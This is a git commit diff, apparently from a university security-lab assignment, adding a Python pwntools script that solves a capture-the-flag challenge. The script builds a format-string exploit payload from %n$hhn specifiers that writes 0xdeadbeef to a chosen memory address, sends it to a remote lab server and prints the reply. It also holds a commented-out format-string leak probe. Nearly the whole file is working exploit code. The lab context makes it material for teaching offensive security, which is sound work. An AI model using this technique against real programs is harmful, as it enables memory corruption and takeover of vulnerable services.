Lab7

2026-01-08 19:16:57 +00:00
parent 555b9062f3
commit 82e15702a7
22 changed files with 376 additions and 0 deletions
--- a/pa/lab7/chall_write_big_numbers.py
+++ b/pa/lab7/chall_write_big_numbers.py
@@ -0,0 +1,38 @@
+from pwn import remote, process, p32
+
+# Does not deal with \0s in any pointers needed
+def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
+	addrs: bytes = b""
+	writes: bytes = b""
+	cum_chars: int = 4 * len(data)
+
+	for offset in range(len(data)):
+		addr = base + offset
+		addrs += p32(addr)
+		arg_n = arg_base + offset
+		n = data[offset] - (cum_chars % 256)
+		if n < 8: n += 256
+		print(f"addr={hex(addr)} byte={hex(data[offset])} cum_chars={cum_chars}({hex(cum_chars%256)}) n={n}")
+		write = f"%{n}x%{arg_n}$hhn"
+		print(write)
+		writes += write.encode('utf-8')
+		cum_chars += n
+
+	pl = addrs + writes
+	if b"\0" in pl: raise Exception("Payload requires a \\0")
+	return pl
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25196
+
+conn = remote(HOST, PORT)
+#conn = process("06_write_big_number")
+#input()
+
+pl = print_to_ram(0x804c044, 7, p32(0xdeadbeef)) + b"\n"
+print(f"Payload: ({len(pl)})", pl, "\n\n")
+#pl = "AAAABBBB.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"
+
+conn.send(pl)
+while conn.connected():
+	print(chr(conn.recv(1)[0]), end="", flush=True)